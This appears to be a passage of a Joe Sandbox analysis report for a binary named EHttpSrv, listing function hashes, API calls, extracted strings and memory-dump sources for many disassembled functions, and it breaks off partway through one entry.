                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 65d4c250b3c0ed55533833a044512dbb364082f86e0d1659ee375bc80d9dcd08
                                                                                                                • Instruction ID: 26c75929185dbee3c79399b8a997fa1e10c0bedbbae0da6622dbb3a9f327ec5c
                                                                                                                • Opcode Fuzzy Hash: 65d4c250b3c0ed55533833a044512dbb364082f86e0d1659ee375bc80d9dcd08
                                                                                                                • Instruction Fuzzy Hash: 8841F8F1904B909BC721DFA98CC1A56FBF5BB14604B90CD2DE18AC3B50D37DF9488A91
                                                                                                                APIs
                                                                                                                • GetCurrentObject.GDI32(?,00000001), ref: 2042FE0D
                                                                                                                • #2362.MFC80U(00000000,?,?,?,?,?,?,?,?,?,FEEA6C22), ref: 2042FE14
                                                                                                                • GetSysColor.USER32(00000008), ref: 2042FE1D
                                                                                                                • #502.MFC80U(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,FEEA6C22), ref: 2042FE2C
                                                                                                                • #5638.MFC80U(00000001), ref: 2042FE40
                                                                                                                • GetObjectW.GDI32(?,00000010,?), ref: 2042FE50
                                                                                                                • SetPixel.GDI32(?,?,?,?), ref: 2042FE88
                                                                                                                • #4117.MFC80U(?,?,?), ref: 2042FE9D
                                                                                                                • #3995.MFC80U(?,?,?,?,?), ref: 2042FEAF
                                                                                                                • #4117.MFC80U(?,?,?,?,?,?,?,?), ref: 2042FEC3
                                                                                                                • #3995.MFC80U(?,?,?,?,?,?,?,?,?,?), ref: 2042FED5
                                                                                                                • #4117.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2042FEE9
                                                                                                                • #3995.MFC80U(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2042FEF9
                                                                                                                  • Part of subcall function 20414A70: #1925.MFC80U(FEEA6C22,?,?,?,00000000,2047B9E9,000000FF), ref: 20414AB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3995#4117$Object$#1925#2362#502#5638ColorCurrentPixel
                                                                                                                • String ID:
                                                                                                                • API String ID: 4087137754-0
                                                                                                                • Opcode ID: 59ecc4f7dc50ed9334732aeb286dce247e3e1767718eeb872eea6448c82c6914
                                                                                                                • Instruction ID: ec0158209c5d8f9ca73e8296061b28e5e4782f84f5fcd26e68bdf0d698a588a5
                                                                                                                • Opcode Fuzzy Hash: 59ecc4f7dc50ed9334732aeb286dce247e3e1767718eeb872eea6448c82c6914
                                                                                                                • Instruction Fuzzy Hash: 6A417FB2604640ABC714CF68CC84E9BB7F9BB98608F058A2CF55AD7694DB38D908CB51
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,?,?,?,?,?,2047A999,000000FF,2044623F,00000000,FEEA6C22), ref: 2044677A
                                                                                                                • #2121.MFC80U(?,?,?,?,?,2047A999), ref: 20446790
                                                                                                                • #2310.MFC80U(?,?,?,?,?,?,?,?,2047A999), ref: 204467B7
                                                                                                                • #2310.MFC80U(?,000001DA,?,?), ref: 204467DC
                                                                                                                • #896.MFC80U(?), ref: 204467E8
                                                                                                                • #2310.MFC80U(?,000001DB,?), ref: 204467FF
                                                                                                                • #896.MFC80U(?), ref: 2044680B
                                                                                                                • #2310.MFC80U(?,000001DC,?), ref: 20446822
                                                                                                                • #896.MFC80U(?), ref: 2044682E
                                                                                                                • #2310.MFC80U(?,000001DE,?), ref: 20446855
                                                                                                                • #2310.MFC80U(?,000001DD,?), ref: 2044687C
                                                                                                                • #896.MFC80U(?), ref: 20446888
                                                                                                                • #578.MFC80U ref: 2044689A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2310$#896$#2121#310#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 431348084-0
                                                                                                                • Opcode ID: bb7dfcbb9b7668d064920e543f2ee97a59a3c71183495b1994f31b68b67a5ed3
                                                                                                                • Instruction ID: 0c633ed7679663834bfc047448413ef689003df879677da101246363d70b1b80
                                                                                                                • Opcode Fuzzy Hash: bb7dfcbb9b7668d064920e543f2ee97a59a3c71183495b1994f31b68b67a5ed3
                                                                                                                • Instruction Fuzzy Hash: 65415EB1504741AFD314DF54DC84FAAB3E8FB88711F048D1DF95693290EB78A909DBA2
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: freememsetstrncmp$BitmapCreatemalloc
                                                                                                                • String ID: $($GIF87a$GIF89a
                                                                                                                • API String ID: 1939045392-356550005
                                                                                                                • Opcode ID: 71fa5580beabcd1dabac6851f2e8876cd4e4eda3ac63b9501a9d6b289ff0ad2b
                                                                                                                • Instruction ID: ef79255f5f6de689009efff0cf3e7f7263fda85f1c023c6d4836178b47eac9f2
                                                                                                                • Opcode Fuzzy Hash: 71fa5580beabcd1dabac6851f2e8876cd4e4eda3ac63b9501a9d6b289ff0ad2b
                                                                                                                • Instruction Fuzzy Hash: D4B1D3B05083508BD724EF94C8817AFB3F1AFC9708F14992DEAC547251E779A948CB97
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176
                                                                                                                • String ID: @iH $APP_FLAGS$BROWSER$BROWSERS$EXCLUDE$PATH$PE_MODULE$PE_MODULES$SETTINGS$TiH
                                                                                                                • API String ID: 1925220103-915843508
                                                                                                                • Opcode ID: 8098f5034abc53fda062f54d5dafdde4ef46e030ae61e6a9d3936b0f0386461b
                                                                                                                • Instruction ID: 314205e89080464e6a841eb27309699c97788495f9a784f3d35cc126bff08289
                                                                                                                • Opcode Fuzzy Hash: 8098f5034abc53fda062f54d5dafdde4ef46e030ae61e6a9d3936b0f0386461b
                                                                                                                • Instruction Fuzzy Hash: A371A0B06146068BD318CBD6D980B1AB3D7AF50608F05C47DEA49A7342E73DED65CBD2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20420040: #764.MFC80U(?,?,?,20462BF8,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 20420074
                                                                                                                  • Part of subcall function 2041B640: #764.MFC80U(?,?,?,20462C00,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 2041B674
                                                                                                                  • Part of subcall function 20412B10: #1176.MFC80U(FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89), ref: 20412B3D
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B64
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B74
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B84
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B94
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BAD
                                                                                                                  • Part of subcall function 2040F390: #764.MFC80U(?,?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3AF
                                                                                                                  • Part of subcall function 2040F390: #764.MFC80U(?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3C7
                                                                                                                • EnterCriticalSection.KERNEL32(?,00000000,FEEA6C22,00000003,-00003AB4,?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 204683BA
                                                                                                                  • Part of subcall function 20412B10: #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BF3
                                                                                                                  • Part of subcall function 20412B10: memset.MSVCR80 ref: 20412C00
                                                                                                                  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD2D
                                                                                                                  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD3D
                                                                                                                  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD51
                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,00000000,20481C82,000000FF,204624F9), ref: 20468556
                                                                                                                • #310.MFC80U(?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 20468568
                                                                                                                • #310.MFC80U(?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 2046857A
                                                                                                                • #4026.MFC80U(000000B7,?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 2046858E
                                                                                                                • #4026.MFC80U(000000B2,?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 2046859D
                                                                                                                • MessageBoxW.USER32(00000000,?,00000001,00000010), ref: 204685B1
                                                                                                                • #578.MFC80U(?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 204685C0
                                                                                                                  • Part of subcall function 20401670: malloc.MSVCR80 ref: 2040169E
                                                                                                                  • Part of subcall function 20401670: malloc.MSVCR80 ref: 204016B0
                                                                                                                  • Part of subcall function 20401670: free.MSVCR80 ref: 204016BD
                                                                                                                • #578.MFC80U(?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 204685D2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#310#4026#578CriticalSectionmalloc$#1176#265EnterLeaveMessagefreememset
                                                                                                                • String ID: ALL$REMOVED
                                                                                                                • API String ID: 217918462-2702759755
                                                                                                                • Opcode ID: a013223bbd1a5acbed5b7c5a7ddfba7f9a8956f06be30daa9be0da43713f8b23
                                                                                                                • Instruction ID: cd4611c72566d2ff1785ef4a9288bc029c4182c3f19a60ae6c62f54ef4cad2ea
                                                                                                                • Opcode Fuzzy Hash: a013223bbd1a5acbed5b7c5a7ddfba7f9a8956f06be30daa9be0da43713f8b23
                                                                                                                • Instruction Fuzzy Hash: FB71A4311183448BC725DFA4CC85BDE77A8AF54B18F448A2DFD49A7251EF38AB09CB52
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,00000060,00000000,?), ref: 2044BD00
                                                                                                                • #776.MFC80U(20485878), ref: 2044BD1B
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2044BD6A
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2044BDB0
                                                                                                                • #2310.MFC80U(0000005C,0000025D,?,?), ref: 2044BDC5
                                                                                                                • #2310.MFC80U(0000005C,0000025E,?,?,?,?), ref: 2044BE5B
                                                                                                                • #578.MFC80U ref: 2044BF17
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2310_snwprintf_s$#310#578#776
                                                                                                                • String ID: %d.%d.%d.%d
                                                                                                                • API String ID: 3047567187-3491811756
                                                                                                                • Opcode ID: 711c0d1743466385d14677d78091ab1b0e3b370ab87f57eda0f6f6fb23002789
                                                                                                                • Instruction ID: 64d5185aea64a231b12683cea7eaeca9a7e724b78cc2e952a1de70f8f02ff7a7
                                                                                                                • Opcode Fuzzy Hash: 711c0d1743466385d14677d78091ab1b0e3b370ab87f57eda0f6f6fb23002789
                                                                                                                • Instruction Fuzzy Hash: 0E7129B5508700DFD324CF65C885F6AB7F5AF89215F008A1EF5DA93390D738AA08DB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042C340: #356.MFC80U(FEEA6C22,00000000,0000000B,?,000000FF,2047EBCB,000000FF,204402AC,0000000B,FEEA6C22,00000000,00000000,00000104,2047FA81,000000FF,20445D01), ref: 2042C369
                                                                                                                  • Part of subcall function 2042C340: #310.MFC80U(FEEA6C22,00000000,0000000B,?,000000FF), ref: 2042C3B1
                                                                                                                  • Part of subcall function 2042C340: #563.MFC80U(?,000000FF), ref: 2042C3C2
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
                                                                                                                  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
                                                                                                                  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
                                                                                                                • #310.MFC80U(?), ref: 2047263D
                                                                                                                • #4026.MFC80U(00000134), ref: 20472676
                                                                                                                • #1925.MFC80U ref: 2047267E
                                                                                                                  • Part of subcall function 2043D740: FindResourceW.KERNEL32(00000000,?,GIF,00000000,?,?,20472692,0000024F), ref: 2043D766
                                                                                                                  • Part of subcall function 2043D740: #1058.MFC80U(?,GIF), ref: 2043D77A
                                                                                                                • GetDC.USER32(00000000), ref: 2047269D
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 204726BC
                                                                                                                • #1271.MFC80U(00000000,00000000,?,?), ref: 204726C7
                                                                                                                • #1925.MFC80U(00000000,00000000,?,?), ref: 204726D2
                                                                                                                • GetDC.USER32(00000000), ref: 204726F1
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 20472714
                                                                                                                  • Part of subcall function 2043AC00: FindResourceW.KERNEL32(00000000,00000251,GIF,?,?,00000000,?,2047270C,00000000), ref: 2043AC0B
                                                                                                                • #1271.MFC80U(00000000,00000000,00000000,?,?), ref: 20472721
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310$#1271#1925#557FindReleaseResource$#1058#356#4026#563CursorEmptyLoadRect
                                                                                                                • String ID: GIF
                                                                                                                • API String ID: 1177867380-881873598
                                                                                                                • Opcode ID: b7200a02f795109c7e3eb7b4e087aaed166f4e15dd9ffb2c75fad47bf353b740
                                                                                                                • Instruction ID: 828355b6802e1fa0bfbb646ce676a9dde5f4986e1d25ae84e4f5a662b53f8f16
                                                                                                                • Opcode Fuzzy Hash: b7200a02f795109c7e3eb7b4e087aaed166f4e15dd9ffb2c75fad47bf353b740
                                                                                                                • Instruction Fuzzy Hash: E3410671104B008FC314DBA4CD86B87BBE4ABA4B09F00C93DF95A97390DBBCA9088752
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063$#1472#2311#310#3756#578MessageSend
                                                                                                                • String ID: xXH
                                                                                                                • API String ID: 2921591435-4004433314
                                                                                                                • Opcode ID: 20ee8d277595217f224ac11ba57411c7c1efebbf3dd559737b910e1f0afa3dc6
                                                                                                                • Instruction ID: 7ec89fc532f9ed1773e2f76ecb9491f977f3ba89ceb0169c2ac635186d8c60f8
                                                                                                                • Opcode Fuzzy Hash: 20ee8d277595217f224ac11ba57411c7c1efebbf3dd559737b910e1f0afa3dc6
                                                                                                                • Instruction Fuzzy Hash: 8641D2711087459FC724CF54CC90BEBBBE9FB58314F008A2DF959576A1EB38A609CB51
                                                                                                                APIs
                                                                                                                • #3793.MFC80U(?,?,?), ref: 20436BCD
                                                                                                                • #2870.MFC80U(00000000,?,00000001,?,?), ref: 20436BE5
                                                                                                                • PtInRect.USER32(?,?,?), ref: 20436BF4
                                                                                                                • SendMessageW.USER32(?,00001102,00000003,00000000), ref: 20436C10
                                                                                                                • GetParent.USER32(?), ref: 20436C16
                                                                                                                • #2366.MFC80U(00000000), ref: 20436C1D
                                                                                                                • #2648.MFC80U(00000000), ref: 20436C31
                                                                                                                • #2648.MFC80U ref: 20436C44
                                                                                                                • SendMessageW.USER32(?,0000004E,00000000,00000000), ref: 20436C55
                                                                                                                • #1894.MFC80U(?,?), ref: 20436C59
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2648MessageSend$#1894#2366#2870#3793ParentRect
                                                                                                                • String ID: n
                                                                                                                • API String ID: 3451452917-2013832146
                                                                                                                • Opcode ID: 8e907037b50fc14d0f54713da9c73fca789de84a615d102d6b827bd69ab568b9
                                                                                                                • Instruction ID: b227bfd30f0165713bd93f83064325098b5a49957d0074c773c577a7dac5abfd
                                                                                                                • Opcode Fuzzy Hash: 8e907037b50fc14d0f54713da9c73fca789de84a615d102d6b827bd69ab568b9
                                                                                                                • Instruction Fuzzy Hash: 321166B22047056BC314DBA9CC95E6F77EDBB8CA14F00CA1CF699C7690DA74D9448BA1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 204725C0: #310.MFC80U(?), ref: 2047263D
                                                                                                                  • Part of subcall function 204725C0: #4026.MFC80U(00000134), ref: 20472676
                                                                                                                  • Part of subcall function 204725C0: #1925.MFC80U ref: 2047267E
                                                                                                                  • Part of subcall function 204725C0: GetDC.USER32(00000000), ref: 2047269D
                                                                                                                  • Part of subcall function 204725C0: ReleaseDC.USER32(00000000,00000000), ref: 204726BC
                                                                                                                  • Part of subcall function 204725C0: #1271.MFC80U(00000000,00000000,?,?), ref: 204726C7
                                                                                                                  • Part of subcall function 204725C0: #1925.MFC80U(00000000,00000000,?,?), ref: 204726D2
                                                                                                                  • Part of subcall function 204725C0: GetDC.USER32(00000000), ref: 204726F1
                                                                                                                  • Part of subcall function 204725C0: #1271.MFC80U(00000000,00000000,00000000,?,?), ref: 20472721
                                                                                                                  • Part of subcall function 20468200: EnterCriticalSection.KERNEL32(-00003A84,FEEA6C22,?,-00003AB4,?,00000000), ref: 20468254
                                                                                                                  • Part of subcall function 20468200: LeaveCriticalSection.KERNEL32(-00003A84,?,00000000), ref: 20468305
                                                                                                                • #310.MFC80U(?), ref: 20468CD1
                                                                                                                • #310.MFC80U ref: 20468CE4
                                                                                                                • #4026.MFC80U(00000271), ref: 20468CFB
                                                                                                                • #4026.MFC80U(00000270), ref: 20468D0A
                                                                                                                • MessageBoxW.USER32(?,FEEA6C22,?,00000040), ref: 20468D1D
                                                                                                                • #578.MFC80U ref: 20468D2E
                                                                                                                • #578.MFC80U ref: 20468D40
                                                                                                                • EnterCriticalSection.KERNEL32(FEEA6C6A,?,?,00000000,?), ref: 20468E59
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 20468ED5
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 20468EF5
                                                                                                                • #1176.MFC80U(?), ref: 20468FE9
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 20469322
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$#310#4026EnterLeave$#1271#1925#578$#1176MessageRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 1322123760-0
                                                                                                                • Opcode ID: 7078abcdab72a5927a4393b918f6e8bfa50432065ef7b6eb6b3f10c921c9fd8d
